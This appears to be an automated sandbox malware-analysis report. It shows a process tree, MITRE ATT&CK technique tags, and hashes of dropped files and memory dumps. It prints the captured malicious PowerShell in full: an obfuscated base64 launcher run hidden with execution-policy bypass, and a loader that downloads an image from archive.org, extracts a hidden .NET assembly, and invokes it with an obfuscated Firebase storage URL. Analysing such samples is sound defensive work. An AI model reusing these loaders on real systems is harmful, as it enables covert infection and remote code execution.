㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBM䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´QQBz䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBi䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBP䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´S䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´Ec䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´E0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBW䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´SQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBv䷡ ㌝ ₋ ⊩ ´Gs䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´bgB1䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´WwBv䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´F0䷡ ㌝ ₋ ⊩ ´XQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBj䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´DU䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´1䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´Dg䷡ ㌝ ₋ ⊩ ´LQBm䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´C0䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´Dc䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Dk䷡ ㌝ ₋ ⊩ ´MwBi䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZQBr䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´m䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´aQBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQ䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´D8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´NQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´cgBv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YgBp䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´LwBt䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´bwBw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´DI䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´cgBj䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´dg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´cwBp䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´YQBl䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´ZwBv䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´ZwBh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBz䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´YgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBm䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Lw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Qw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´U䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´ZwBy䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bQBE䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cwBv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bk䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBQ䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´JwBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´aQB2䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('䷡ ㌝ ₋ ⊩ ´','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('cc8b59e3256f-a768-fbb4-9e70-d8e93bf2=nekot&aidem=tla?txt.1042028050mrowxyobihc/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bfd48e7300eacf5a5945982f82f6c88c

SHA1
f8b3b52281d455ede71d6760dbabd7539da0a298

SHA256
683ffb972dcfd986208de58c26439e42641d60b028bf6c0ad8dbacc3a0451429

SHA512
ad5e573172244439424ebe1e60f5443d8363d09892dc4519cfaff7e16f1e9ba09067b9c46ff79c8e6d20890ebeb1a3da71f67bde6723276f9a7a7ec9bc4ca4e5

Download Submit
memory/1056-4-0x000007FEF6B2E000-0x000007FEF6B2F000-memory.dmp

Filesize
4KB

Download
memory/1056-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/1056-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/1056-7-0x000007FEF6870000-0x000007FEF720D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-8-0x000007FEF6870000-0x000007FEF720D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-9-0x000007FEF6870000-0x000007FEF720D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-15-0x000007FEF6870000-0x000007FEF720D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing